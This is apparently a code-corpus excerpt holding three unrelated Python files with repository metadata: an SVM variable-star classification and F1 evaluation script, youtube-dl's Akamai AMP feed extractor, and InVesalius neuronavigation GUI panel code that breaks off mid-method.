names = ['Magnitude', 'clipped_sigma', 'meaningless_1', 'meaningless_2',
'star_ID', 'weighted_sigma', 'skew', 'kurt', 'I', 'J', 'K', 'L',
'Npts', 'MAD', 'lag1', 'RoMS', 'rCh2', 'Isgn', 'Vp2p', 'Jclp', 'Lclp',
'Jtim', 'Ltim', 'CSSD', 'Ex', 'inv_eta', 'E_A', 'S_B', 'NXS', 'IQR']
names_to_delete = ['meaningless_1', 'meaningless_2', 'star_ID',
'Npts', 'CSSD', 'clipped_sigma', 'lag1', 'L', 'Lclp', 'Jclp',
'MAD', 'Ltim']
X_tgt, feature_names, df, df_orig = load_data_tgt(file_tgt, names,
names_to_delete, delta)
y_pred = pipeline.predict(X_tgt)
y_probs = pipeline.predict_proba(X_tgt)[:, 1]
idx = y_probs > 0.5
idx_ = y_probs < 0.5
svm_no = list(df_orig['star_ID'][idx_])
print("Found {} variables".format(np.count_nonzero(idx)))
with open('svm_results_final.txt', 'w') as fo:
for line in list(df_orig['star_ID'][idx]):
fo.write(line + '\n')
# Check F1
with open('clean_list_of_new_variables.txt', 'r') as fo:
news = fo.readlines()
news = [line.strip().split(' ')[1] for line in news]
news = set(news)
with open('svm_results_final.txt', 'r') as fo:
svm = fo.readlines()
svm = [line.strip().split('_')[4].split('.')[0] for line in svm]
svm = set(svm)
print "Among new vars found {}".format(len(news.intersection(svm)))
with open('candidates_50perc_threshold.txt', 'r') as fo:
c50 = fo.readlines()
c50 = [line.strip("\", ', \", \n, }, {") for line in c50]
with open('variables_not_in_catalogs.txt', 'r') as fo:
not_in_cat = fo.readlines()
nic = [line.strip().split(' ')[1] for line in not_in_cat]
# Catalogue variables
cat_vars = set(c50).difference(set(nic))
# Non-catalogue variable
noncat_vars = set([line.strip().split(' ')[1] for line in not_in_cat if 'CST' not in line])
# All variables
all_vars = news.union(cat_vars).union(noncat_vars)
svm_no = set([line.strip().split('_')[4].split('.')[0] for line in svm_no])
found_bad = '181193' in svm
print "Found known variable : ", found_bad
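# Confusion-matrix counts: ground-truth positives are the union of new, catalogue and
# non-catalogue variables; predictions come from the 50% probability split above.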
FN = len(svm_no.intersection(all_vars))
TP = len(all_vars.intersection(svm))
TN = len(svm_no) - FN
FP = len(svm) - TP
recall = float(TP) / (TP + FN)
precision = float(TP) / (TP + FP)
F1 = 2 * precision * recall / (precision + recall)
print "precision: {}".format(precision)
print "recall: {}".format(recall)
print "F1: {}".format(F1)
print "TN={}, FP={}".format(TN, FP)
print "FN={}, TP={}".format(FN, TP)
| mit | 1,784,097,725,569,974,800 | 38.555556 | 94 | 0.606742 | false |
Tithen-Firion/youtube-dl | youtube_dl/extractor/amp.py | 3 | 3633 | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
int_or_none,
parse_iso8601,
mimetype2ext,
determine_ext,
ExtractorError,
)
class AMPIE(InfoExtractor):
# parse Akamai Adaptive Media Player feed
def _extract_feed_info(self, url):
feed = self._download_json(
url, None, 'Downloading Akamai AMP feed',
'Unable to download Akamai AMP feed')
item = feed.get('channel', {}).get('item')
if not item:
raise ExtractorError('%s said: %s' % (self.IE_NAME, feed['error']))
video_id = item['guid']
def get_media_node(name, default=None):
media_name = 'media-%s' % name
media_group = item.get('media-group') or item
return media_group.get(media_name) or item.get(media_name) or item.get(name, default)
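        # Collect thumbnails, subtitles and downloadable formats from the feed item.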
thumbnails = []
media_thumbnail = get_media_node('thumbnail')
if media_thumbnail:
if isinstance(media_thumbnail, dict):
media_thumbnail = [media_thumbnail]
for thumbnail_data in media_thumbnail:
thumbnail = thumbnail_data['@attributes']
thumbnails.append({
'url': self._proto_relative_url(thumbnail['url'], 'http:'),
'width': int_or_none(thumbnail.get('width')),
'height': int_or_none(thumbnail.get('height')),
})
subtitles = {}
media_subtitle = get_media_node('subTitle')
if media_subtitle:
if isinstance(media_subtitle, dict):
media_subtitle = [media_subtitle]
for subtitle_data in media_subtitle:
subtitle = subtitle_data['@attributes']
lang = subtitle.get('lang') or 'en'
subtitles[lang] = [{'url': subtitle['href']}]
formats = []
media_content = get_media_node('content')
if isinstance(media_content, dict):
media_content = [media_content]
for media_data in media_content:
media = media_data.get('@attributes', {})
media_url = media.get('url')
if not media_url:
continue
ext = mimetype2ext(media.get('type')) or determine_ext(media_url)
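            # Feeds may expose HDS (f4m) manifests, HLS (m3u8) playlists or plain progressive
            # URLs; dispatch each entry to the matching format extractor.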
if ext == 'f4m':
formats.extend(self._extract_f4m_formats(
media_url + '?hdcore=3.4.0&plugin=aasp-3.4.0.132.124',
video_id, f4m_id='hds', fatal=False))
elif ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
media_url, video_id, 'mp4', m3u8_id='hls', fatal=False))
else:
formats.append({
'format_id': media_data.get('media-category', {}).get('@attributes', {}).get('label'),
'url': media['url'],
'tbr': int_or_none(media.get('bitrate')),
'filesize': int_or_none(media.get('fileSize')),
'ext': ext,
})
self._sort_formats(formats)
timestamp = parse_iso8601(item.get('pubDate'), ' ') or parse_iso8601(item.get('dc-date'))
return {
'id': video_id,
'title': get_media_node('title'),
'description': get_media_node('description'),
'thumbnails': thumbnails,
'timestamp': timestamp,
'duration': int_or_none(media_content[0].get('@attributes', {}).get('duration')),
'subtitles': subtitles,
'formats': formats,
}
| unlicense | 1,595,772,301,398,573,300 | 38.064516 | 106 | 0.527663 | false |
paulojamorim/invesalius3 | invesalius/gui/task_navigator.py | 5 | 98510 | #--------------------------------------------------------------------------
# Software: InVesalius - Software de Reconstrucao 3D de Imagens Medicas
# Copyright: (C) 2001 Centro de Pesquisas Renato Archer
# Homepage: http://www.softwarepublico.gov.br
# Contact: [email protected]
# License: GNU - GPL 2 (LICENSE.txt/LICENCA.txt)
#--------------------------------------------------------------------------
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; in accordance with
# version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#--------------------------------------------------------------------------
from functools import partial
import csv
import os
import queue
import sys
import threading
import nibabel as nb
import numpy as np
try:
import Trekker
has_trekker = True
except ImportError:
has_trekker = False
import wx
try:
import wx.lib.agw.hyperlink as hl
import wx.lib.agw.foldpanelbar as fpb
except ImportError:
import wx.lib.hyperlink as hl
import wx.lib.foldpanelbar as fpb
import wx.lib.colourselect as csel
import wx.lib.masked.numctrl
from pubsub import pub as Publisher
from time import sleep
import invesalius.constants as const
import invesalius.data.bases as db
if has_trekker:
import invesalius.data.brainmesh_handler as brain
import invesalius.data.coordinates as dco
import invesalius.data.coregistration as dcr
import invesalius.data.slice_ as sl
import invesalius.data.trackers as dt
import invesalius.data.tractography as dti
import invesalius.data.transformations as tr
import invesalius.data.trigger as trig
import invesalius.data.record_coords as rec
import invesalius.data.vtk_utils as vtk_utils
import invesalius.gui.dialogs as dlg
import invesalius.project as prj
from invesalius import utils
BTN_NEW = wx.NewId()
BTN_IMPORT_LOCAL = wx.NewId()
class TaskPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
inner_panel = InnerTaskPanel(self)
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.Add(inner_panel, 1, wx.EXPAND|wx.GROW|wx.BOTTOM|wx.RIGHT |
wx.LEFT, 7)
sizer.Fit(self)
self.SetSizer(sizer)
self.Update()
self.SetAutoLayout(1)
class InnerTaskPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
default_colour = self.GetBackgroundColour()
background_colour = wx.Colour(255,255,255)
self.SetBackgroundColour(background_colour)
txt_nav = wx.StaticText(self, -1, _('Select fiducials and navigate'),
size=wx.Size(90, 20))
txt_nav.SetFont(wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD))
# Create horizontal sizer to represent lines in the panel
txt_sizer = wx.BoxSizer(wx.HORIZONTAL)
txt_sizer.Add(txt_nav, 1, wx.EXPAND|wx.GROW, 5)
# Fold panel which contains navigation configurations
fold_panel = FoldPanel(self)
fold_panel.SetBackgroundColour(default_colour)
# Add line sizer into main sizer
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(txt_sizer, 0, wx.GROW|wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
main_sizer.Add(fold_panel, 1, wx.GROW|wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
main_sizer.AddSpacer(5)
main_sizer.Fit(self)
self.SetSizerAndFit(main_sizer)
self.Update()
self.SetAutoLayout(1)
self.sizer = main_sizer
class FoldPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
inner_panel = InnerFoldPanel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(inner_panel, 0, wx.EXPAND|wx.GROW)
sizer.Fit(self)
self.SetSizerAndFit(sizer)
self.Update()
self.SetAutoLayout(1)
class InnerFoldPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
try:
default_colour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_MENUBAR)
except AttributeError:
default_colour = wx.SystemSettings_GetColour(wx.SYS_COLOUR_MENUBAR)
self.SetBackgroundColour(default_colour)
self.__bind_events()
# Fold panel and its style settings
        # FIXME: If we don't insert a value in size or if we set wx.DefaultSize,
        # the fold_panel doesn't show. This means that, for some reason, Sizer
# is not working properly in this panel. It might be on some child or
# parent panel. Perhaps we need to insert the item into the sizer also...
# Study this.
fold_panel = fpb.FoldPanelBar(self, -1, wx.DefaultPosition,
(10, 310), 0, fpb.FPB_SINGLE_FOLD)
# Fold panel style
style = fpb.CaptionBarStyle()
style.SetCaptionStyle(fpb.CAPTIONBAR_GRADIENT_V)
style.SetFirstColour(default_colour)
style.SetSecondColour(default_colour)
# Fold 1 - Navigation panel
item = fold_panel.AddFoldPanel(_("Neuronavigation"), collapsed=True)
ntw = NeuronavigationPanel(item)
fold_panel.ApplyCaptionStyle(item, style)
fold_panel.AddFoldPanelWindow(item, ntw, spacing=0,
leftSpacing=0, rightSpacing=0)
fold_panel.Expand(fold_panel.GetFoldPanel(0))
# Fold 2 - Object registration panel
item = fold_panel.AddFoldPanel(_("Object registration"), collapsed=True)
otw = ObjectRegistrationPanel(item)
fold_panel.ApplyCaptionStyle(item, style)
fold_panel.AddFoldPanelWindow(item, otw, spacing=0,
leftSpacing=0, rightSpacing=0)
# Fold 3 - Markers panel
item = fold_panel.AddFoldPanel(_("Markers"), collapsed=True)
mtw = MarkersPanel(item)
fold_panel.ApplyCaptionStyle(item, style)
fold_panel.AddFoldPanelWindow(item, mtw, spacing= 0,
leftSpacing=0, rightSpacing=0)
# Fold 4 - Tractography panel
if has_trekker:
item = fold_panel.AddFoldPanel(_("Tractography"), collapsed=True)
otw = TractographyPanel(item)
fold_panel.ApplyCaptionStyle(item, style)
fold_panel.AddFoldPanelWindow(item, otw, spacing=0,
leftSpacing=0, rightSpacing=0)
# Fold 5 - DBS
self.dbs_item = fold_panel.AddFoldPanel(_("Deep Brain Stimulation"), collapsed=True)
        dtw = DbsPanel(self.dbs_item)  # Assign to a new variable and create the panel
fold_panel.ApplyCaptionStyle(self.dbs_item, style)
fold_panel.AddFoldPanelWindow(self.dbs_item, dtw, spacing= 0,
leftSpacing=0, rightSpacing=0)
self.dbs_item.Hide()
# Check box for camera update in volume rendering during navigation
tooltip = wx.ToolTip(_("Update camera in volume"))
checkcamera = wx.CheckBox(self, -1, _('Vol. camera'))
checkcamera.SetToolTip(tooltip)
checkcamera.SetValue(const.CAM_MODE)
checkcamera.Bind(wx.EVT_CHECKBOX, self.OnVolumeCamera)
self.checkcamera = checkcamera
# Check box for trigger monitoring to create markers from serial port
tooltip = wx.ToolTip(_("Enable external trigger for creating markers"))
checktrigger = wx.CheckBox(self, -1, _('Ext. trigger'))
checktrigger.SetToolTip(tooltip)
checktrigger.SetValue(False)
checktrigger.Bind(wx.EVT_CHECKBOX, partial(self.OnExternalTrigger, ctrl=checktrigger))
self.checktrigger = checktrigger
# Check box for object position and orientation update in volume rendering during navigation
tooltip = wx.ToolTip(_("Show and track TMS coil"))
checkobj = wx.CheckBox(self, -1, _('Show coil'))
checkobj.SetToolTip(tooltip)
checkobj.SetValue(False)
checkobj.Disable()
checkobj.Bind(wx.EVT_CHECKBOX, self.OnShowObject)
self.checkobj = checkobj
# if sys.platform != 'win32':
self.checkcamera.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
checktrigger.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
checkobj.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
line_sizer = wx.BoxSizer(wx.HORIZONTAL)
line_sizer.Add(checkcamera, 0, wx.ALIGN_LEFT | wx.RIGHT | wx.LEFT, 5)
line_sizer.Add(checktrigger, 0, wx.ALIGN_CENTER)
line_sizer.Add(checkobj, 0, wx.RIGHT | wx.LEFT, 5)
line_sizer.Fit(self)
# Panel sizer to expand fold panel
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(fold_panel, 0, wx.GROW|wx.EXPAND)
sizer.Add(line_sizer, 1, wx.GROW | wx.EXPAND)
sizer.Fit(self)
self.track_obj = False
self.SetSizer(sizer)
self.Update()
self.SetAutoLayout(1)
def __bind_events(self):
Publisher.subscribe(self.OnCheckStatus, 'Navigation status')
Publisher.subscribe(self.OnShowObject, 'Update track object state')
Publisher.subscribe(self.OnVolumeCamera, 'Change camera checkbox')
Publisher.subscribe(self.OnShowDbs, "Active dbs folder")
Publisher.subscribe(self.OnHideDbs, "Deactive dbs folder")
def OnShowDbs(self):
self.dbs_item.Show()
def OnHideDbs(self):
self.dbs_item.Hide()
def OnCheckStatus(self, nav_status, vis_status):
if nav_status:
self.checktrigger.Enable(False)
self.checkobj.Enable(False)
else:
self.checktrigger.Enable(True)
if self.track_obj:
self.checkobj.Enable(True)
def OnExternalTrigger(self, evt, ctrl):
Publisher.sendMessage('Update trigger state', trigger_state=ctrl.GetValue())
def OnShowObject(self, evt=None, flag=None, obj_name=None, polydata=None):
if not evt:
if flag:
self.checkobj.Enable(True)
self.checkobj.SetValue(True)
self.track_obj = True
Publisher.sendMessage('Status target button', status=True)
else:
self.checkobj.Enable(False)
self.checkobj.SetValue(False)
self.track_obj = False
Publisher.sendMessage('Status target button', status=False)
Publisher.sendMessage('Update show object state', state=self.checkobj.GetValue())
def OnVolumeCamera(self, evt=None, status=None):
if not evt:
self.checkcamera.SetValue(status)
Publisher.sendMessage('Update volume camera state', camera_state=self.checkcamera.GetValue())
class NeuronavigationPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
try:
default_colour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_MENUBAR)
except AttributeError:
default_colour = wx.SystemSettings_GetColour(wx.SYS_COLOUR_MENUBAR)
self.SetBackgroundColour(default_colour)
self.SetAutoLayout(1)
self.__bind_events()
# Initialize global variables
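        # self.fiducials stores the three image and three tracker fiducials (one xyz row each);
        # self.fiducials_raw keeps the raw probe and reference sensor readings for the tracker fiducials.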
self.fiducials = np.full([6, 3], np.nan)
self.fiducials_raw = np.zeros((6, 6))
self.correg = None
self.current_coord = 0, 0, 0
self.trk_init = None
self.nav_status = False
self.trigger = None
self.trigger_state = False
self.obj_reg = None
self.obj_reg_status = False
self.track_obj = False
self.m_icp = None
self.fre = None
self.icp_fre = None
self.icp = False
self.event = threading.Event()
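        # Single-slot queues used to hand data between the worker threads started in OnNavigate:
        # coregistered coordinates, trigger pulses, coordinates for tract computation, computed tracts and ICP state.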
self.coord_queue = QueueCustom(maxsize=1)
self.icp_queue = QueueCustom(maxsize=1)
# self.visualization_queue = QueueCustom(maxsize=1)
self.trigger_queue = QueueCustom(maxsize=1)
self.coord_tracts_queue = QueueCustom(maxsize=1)
self.tracts_queue = QueueCustom(maxsize=1)
# Tractography parameters
self.trk_inp = None
self.trekker = None
self.n_threads = None
self.view_tracts = False
self.enable_act = False
self.act_data = None
self.n_tracts = const.N_TRACTS
self.seed_offset = const.SEED_OFFSET
self.seed_radius = const.SEED_RADIUS
self.sleep_nav = const.SLEEP_NAVIGATION
self.tracker_id = const.DEFAULT_TRACKER
self.ref_mode_id = const.DEFAULT_REF_MODE
# Initialize list of buttons and numctrls for wx objects
self.btns_coord = [None, None, None, None, None, None]
self.numctrls_coord = [[], [], [], [], [], []]
# ComboBox for spatial tracker device selection
tooltip = wx.ToolTip(_("Choose the tracking device"))
choice_trck = wx.ComboBox(self, -1, "",
choices=const.TRACKER, style=wx.CB_DROPDOWN|wx.CB_READONLY)
choice_trck.SetToolTip(tooltip)
choice_trck.SetSelection(const.DEFAULT_TRACKER)
choice_trck.Bind(wx.EVT_COMBOBOX, partial(self.OnChoiceTracker, ctrl=choice_trck))
self.choice_trck = choice_trck
# ComboBox for tracker reference mode
tooltip = wx.ToolTip(_("Choose the navigation reference mode"))
choice_ref = wx.ComboBox(self, -1, "",
choices=const.REF_MODE, style=wx.CB_DROPDOWN|wx.CB_READONLY)
choice_ref.SetSelection(const.DEFAULT_REF_MODE)
choice_ref.SetToolTip(tooltip)
choice_ref.Bind(wx.EVT_COMBOBOX, partial(self.OnChoiceRefMode, ctrl=choice_trck))
# Toggle buttons for image fiducials
btns_img = const.BTNS_IMG
tips_img = const.TIPS_IMG
for k in btns_img:
n = list(btns_img[k].keys())[0]
lab = list(btns_img[k].values())[0]
self.btns_coord[n] = wx.ToggleButton(self, k, label=lab, size=wx.Size(45, 23))
self.btns_coord[n].SetToolTip(wx.ToolTip(tips_img[n]))
self.btns_coord[n].Bind(wx.EVT_TOGGLEBUTTON, self.OnImageFiducials)
# Push buttons for tracker fiducials
btns_trk = const.BTNS_TRK
tips_trk = const.TIPS_TRK
for k in btns_trk:
n = list(btns_trk[k].keys())[0]
lab = list(btns_trk[k].values())[0]
self.btns_coord[n] = wx.Button(self, k, label=lab, size=wx.Size(45, 23))
self.btns_coord[n].SetToolTip(wx.ToolTip(tips_trk[n-3]))
self.btns_coord[n].Bind(wx.EVT_BUTTON, self.OnTrackerFiducials)
        # TODO: Find a better alignment between FRE, text and navigate button
txt_fre = wx.StaticText(self, -1, _('FRE:'))
txt_icp = wx.StaticText(self, -1, _('Refine:'))
# Fiducial registration error text box
tooltip = wx.ToolTip(_("Fiducial registration error"))
txtctrl_fre = wx.TextCtrl(self, value="", size=wx.Size(60, -1), style=wx.TE_CENTRE)
txtctrl_fre.SetFont(wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD))
txtctrl_fre.SetBackgroundColour('WHITE')
txtctrl_fre.SetEditable(0)
txtctrl_fre.SetToolTip(tooltip)
self.txtctrl_fre = txtctrl_fre
# Toggle button for neuronavigation
tooltip = wx.ToolTip(_("Start navigation"))
btn_nav = wx.ToggleButton(self, -1, _("Navigate"), size=wx.Size(80, -1))
btn_nav.SetToolTip(tooltip)
btn_nav.Bind(wx.EVT_TOGGLEBUTTON, partial(self.OnNavigate, btn=(btn_nav, choice_trck, choice_ref)))
tooltip = wx.ToolTip(_(u"Refine the coregistration"))
checkicp = wx.CheckBox(self, -1, _(' '))
checkicp.SetValue(False)
checkicp.Enable(False)
checkicp.Bind(wx.EVT_CHECKBOX, partial(self.Oncheckicp, ctrl=checkicp))
checkicp.SetToolTip(tooltip)
self.checkicp = checkicp
# Image and tracker coordinates number controls
for m in range(len(self.btns_coord)):
for n in range(3):
self.numctrls_coord[m].append(
wx.lib.masked.numctrl.NumCtrl(parent=self, integerWidth=4, fractionWidth=1))
# Sizer to group all GUI objects
choice_sizer = wx.FlexGridSizer(rows=1, cols=2, hgap=5, vgap=5)
choice_sizer.AddMany([(choice_trck, wx.LEFT),
(choice_ref, wx.RIGHT)])
coord_sizer = wx.GridBagSizer(hgap=5, vgap=5)
for m in range(len(self.btns_coord)):
coord_sizer.Add(self.btns_coord[m], pos=wx.GBPosition(m, 0))
for n in range(3):
coord_sizer.Add(self.numctrls_coord[m][n], pos=wx.GBPosition(m, n+1))
if m in range(1, 6):
self.numctrls_coord[m][n].SetEditable(False)
nav_sizer = wx.FlexGridSizer(rows=1, cols=5, hgap=5, vgap=5)
nav_sizer.AddMany([(txt_fre, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL),
(txtctrl_fre, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL),
(btn_nav, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL),
(txt_icp, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL),
(checkicp, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL)])
group_sizer = wx.FlexGridSizer(rows=9, cols=1, hgap=5, vgap=5)
group_sizer.AddGrowableCol(0, 1)
group_sizer.AddGrowableRow(0, 1)
group_sizer.AddGrowableRow(1, 1)
group_sizer.AddGrowableRow(2, 1)
group_sizer.SetFlexibleDirection(wx.BOTH)
group_sizer.AddMany([(choice_sizer, 0, wx.ALIGN_CENTER_HORIZONTAL),
(coord_sizer, 0, wx.ALIGN_CENTER_HORIZONTAL),
(nav_sizer, 0, wx.ALIGN_CENTER_HORIZONTAL)])
main_sizer = wx.BoxSizer(wx.HORIZONTAL)
main_sizer.Add(group_sizer, 1)# wx.ALIGN_CENTER_HORIZONTAL, 10)
self.sizer = main_sizer
self.SetSizer(main_sizer)
self.Fit()
def __bind_events(self):
Publisher.subscribe(self.LoadImageFiducials, 'Load image fiducials')
Publisher.subscribe(self.UpdateTriggerState, 'Update trigger state')
Publisher.subscribe(self.UpdateTrackObjectState, 'Update track object state')
Publisher.subscribe(self.UpdateImageCoordinates, 'Set cross focal point')
Publisher.subscribe(self.OnDisconnectTracker, 'Disconnect tracker')
Publisher.subscribe(self.UpdateObjectRegistration, 'Update object registration')
Publisher.subscribe(self.OnCloseProject, 'Close project data')
Publisher.subscribe(self.UpdateTrekkerObject, 'Update Trekker object')
Publisher.subscribe(self.UpdateNumTracts, 'Update number of tracts')
Publisher.subscribe(self.UpdateSeedOffset, 'Update seed offset')
Publisher.subscribe(self.UpdateSeedRadius, 'Update seed radius')
Publisher.subscribe(self.UpdateSleep, 'Update sleep')
Publisher.subscribe(self.UpdateNumberThreads, 'Update number of threads')
Publisher.subscribe(self.UpdateTractsVisualization, 'Update tracts visualization')
Publisher.subscribe(self.EnableACT, 'Enable ACT')
Publisher.subscribe(self.UpdateACTData, 'Update ACT data')
Publisher.subscribe(self.UpdateNavigationStatus, 'Navigation status')
def LoadImageFiducials(self, marker_id, coord):
for n in const.BTNS_IMG_MKS:
btn_id = list(const.BTNS_IMG_MKS[n].keys())[0]
fid_id = list(const.BTNS_IMG_MKS[n].values())[0]
if marker_id == fid_id and not self.btns_coord[btn_id].GetValue():
self.btns_coord[btn_id].SetValue(True)
self.fiducials[btn_id, :] = coord[0:3]
for m in [0, 1, 2]:
self.numctrls_coord[btn_id][m].SetValue(coord[m])
def UpdateNavigationStatus(self, nav_status, vis_status):
self.nav_status = nav_status
if nav_status and (self.m_icp is not None):
self.checkicp.Enable(True)
else:
self.checkicp.Enable(False)
#self.checkicp.SetValue(False)
def UpdateFRE(self, fre):
        # TODO: Exhibit FRE in a warning dialog and only start navigation after the user clicks OK
self.txtctrl_fre.SetValue(str(round(fre, 2)))
if fre <= 3:
self.txtctrl_fre.SetBackgroundColour('GREEN')
else:
self.txtctrl_fre.SetBackgroundColour('RED')
def UpdateTrekkerObject(self, data):
# self.trk_inp = data
self.trekker = data
def UpdateNumTracts(self, data):
self.n_tracts = data
def UpdateSeedOffset(self, data):
self.seed_offset = data
def UpdateSeedRadius(self, data):
self.seed_radius = data
def UpdateSleep(self, data):
self.sleep_nav = data
def UpdateNumberThreads(self, data):
self.n_threads = data
def UpdateTractsVisualization(self, data):
self.view_tracts = data
def UpdateACTData(self, data):
self.act_data = data
def EnableACT(self, data):
self.enable_act = data
def UpdateImageCoordinates(self, position):
# TODO: Change from world coordinates to matrix coordinates. They are better for multi software communication.
self.current_coord = position
for m in [0, 1, 2]:
if not self.btns_coord[m].GetValue():
for n in [0, 1, 2]:
self.numctrls_coord[m][n].SetValue(float(self.current_coord[n]))
def UpdateObjectRegistration(self, data=None):
if data:
self.obj_reg = data
self.obj_reg_status = True
else:
self.obj_reg = None
self.obj_reg_status = False
def UpdateTrackObjectState(self, evt=None, flag=None, obj_name=None, polydata=None):
self.track_obj = flag
def UpdateTriggerState(self, trigger_state):
self.trigger_state = trigger_state
def OnDisconnectTracker(self):
if self.tracker_id:
dt.TrackerConnection(self.tracker_id, self.trk_init[0], 'disconnect')
def OnChoiceTracker(self, evt, ctrl):
Publisher.sendMessage('Update status text in GUI',
label=_("Configuring tracker ..."))
if hasattr(evt, 'GetSelection'):
choice = evt.GetSelection()
else:
choice = const.DISCTRACK
if self.trk_init:
trck = self.trk_init[0]
else:
trck = None
# Conditions check if click was on current selection and if any other tracker
# has been initialized before
if trck and choice != const.DISCTRACK:
self.ResetTrackerFiducials()
Publisher.sendMessage('Update status text in GUI',
label=_("Disconnecting tracker..."))
Publisher.sendMessage('Remove sensors ID')
self.trk_init = dt.TrackerConnection(self.tracker_id, trck, 'disconnect')
Publisher.sendMessage('Remove object data')
self.tracker_id = choice
if not self.trk_init[0] and choice:
Publisher.sendMessage('Update status text in GUI',
label=_("Tracker disconnected successfully"))
self.trk_init = dt.TrackerConnection(self.tracker_id, None, 'connect')
if not self.trk_init[0]:
dlg.ShowNavigationTrackerWarning(self.tracker_id, self.trk_init[1])
ctrl.SetSelection(0)
print("Tracker not connected!")
else:
ctrl.SetSelection(self.tracker_id)
print("Tracker connected!")
elif choice == const.DISCTRACK:
if trck:
self.ResetTrackerFiducials()
Publisher.sendMessage('Update status text in GUI',
label=_("Disconnecting tracker ..."))
Publisher.sendMessage('Remove sensors ID')
Publisher.sendMessage('Remove object data')
self.trk_init = dt.TrackerConnection(self.tracker_id, trck, 'disconnect')
if not self.trk_init[0]:
if evt is not False:
dlg.ShowNavigationTrackerWarning(self.tracker_id, 'disconnect')
self.tracker_id = 0
ctrl.SetSelection(self.tracker_id)
Publisher.sendMessage('Update status text in GUI',
label=_("Tracker disconnected"))
print("Tracker disconnected!")
else:
Publisher.sendMessage('Update status text in GUI',
label=_("Tracker still connected"))
print("Tracker still connected!")
else:
ctrl.SetSelection(self.tracker_id)
else:
            # If trk_init is None, try to connect. If that doesn't succeed, show the warning dialog.
if choice:
self.tracker_id = choice
self.trk_init = dt.TrackerConnection(self.tracker_id, None, 'connect')
if not self.trk_init[0]:
dlg.ShowNavigationTrackerWarning(self.tracker_id, self.trk_init[1])
self.tracker_id = 0
ctrl.SetSelection(self.tracker_id)
Publisher.sendMessage('Update status text in GUI', label=_("Ready"))
Publisher.sendMessage('Update tracker initializer',
nav_prop=(self.tracker_id, self.trk_init, self.ref_mode_id))
def OnChoiceRefMode(self, evt, ctrl):
# When ref mode is changed the tracker coordinates are set to zero
self.ref_mode_id = evt.GetSelection()
self.ResetTrackerFiducials()
# Some trackers do not accept restarting within this time window
# TODO: Improve the restarting of trackers after changing reference mode
# self.OnChoiceTracker(None, ctrl)
Publisher.sendMessage('Update tracker initializer',
nav_prop=(self.tracker_id, self.trk_init, self.ref_mode_id))
print("Reference mode changed!")
def OnImageFiducials(self, evt):
btn_id = list(const.BTNS_IMG_MKS[evt.GetId()].keys())[0]
marker_id = list(const.BTNS_IMG_MKS[evt.GetId()].values())[0]
if self.btns_coord[btn_id].GetValue():
coord = self.numctrls_coord[btn_id][0].GetValue(),\
self.numctrls_coord[btn_id][1].GetValue(),\
self.numctrls_coord[btn_id][2].GetValue(), 0, 0, 0
self.fiducials[btn_id, :] = coord[0:3]
Publisher.sendMessage('Create marker', coord=coord, marker_id=marker_id)
else:
for n in [0, 1, 2]:
self.numctrls_coord[btn_id][n].SetValue(float(self.current_coord[n]))
self.fiducials[btn_id, :] = np.nan
Publisher.sendMessage('Delete fiducial marker', marker_id=marker_id)
def OnTrackerFiducials(self, evt):
btn_id = list(const.BTNS_TRK[evt.GetId()].keys())[0]
coord = None
if self.trk_init and self.tracker_id:
# if self.tracker_id == const.DEBUGTRACK:
# if btn_id == 3:
# coord1 = np.array([-120., 0., 0., 0., 0., 0.])
# elif btn_id == 4:
# coord1 = np.array([120., 0., 0., 0., 0., 0.])
# elif btn_id == 5:
# coord1 = np.array([0., 120., 0., 0., 0., 0.])
# coord2 = np.zeros([3, 6])
# coord_raw = np.vstack([coord1, coord2])
# else:
coord_raw = dco.GetCoordinates(self.trk_init, self.tracker_id, self.ref_mode_id)
if self.ref_mode_id:
coord = dco.dynamic_reference_m(coord_raw[0, :], coord_raw[1, :])
else:
coord = coord_raw[0, :]
coord[2] = -coord[2]
else:
dlg.ShowNavigationTrackerWarning(0, 'choose')
# Update number controls with tracker coordinates
if coord is not None:
self.fiducials[btn_id, :] = coord[0:3]
if btn_id == 3:
self.fiducials_raw[0, :] = coord_raw[0, :]
self.fiducials_raw[1, :] = coord_raw[1, :]
elif btn_id == 4:
self.fiducials_raw[2, :] = coord_raw[0, :]
self.fiducials_raw[3, :] = coord_raw[1, :]
else:
self.fiducials_raw[4, :] = coord_raw[0, :]
self.fiducials_raw[5, :] = coord_raw[1, :]
for n in [0, 1, 2]:
self.numctrls_coord[btn_id][n].SetValue(float(coord[n]))
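    # Optional registration refinement: the ICP dialog collects extra points and returns a
    # correction matrix (m_icp) applied on top of the fiducial registration; the errors before
    # and after refinement are reported to the user.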
def OnICP(self):
dialog = dlg.ICPCorregistrationDialog(nav_prop=(self.tracker_id, self.trk_init, self.ref_mode_id))
if dialog.ShowModal() == wx.ID_OK:
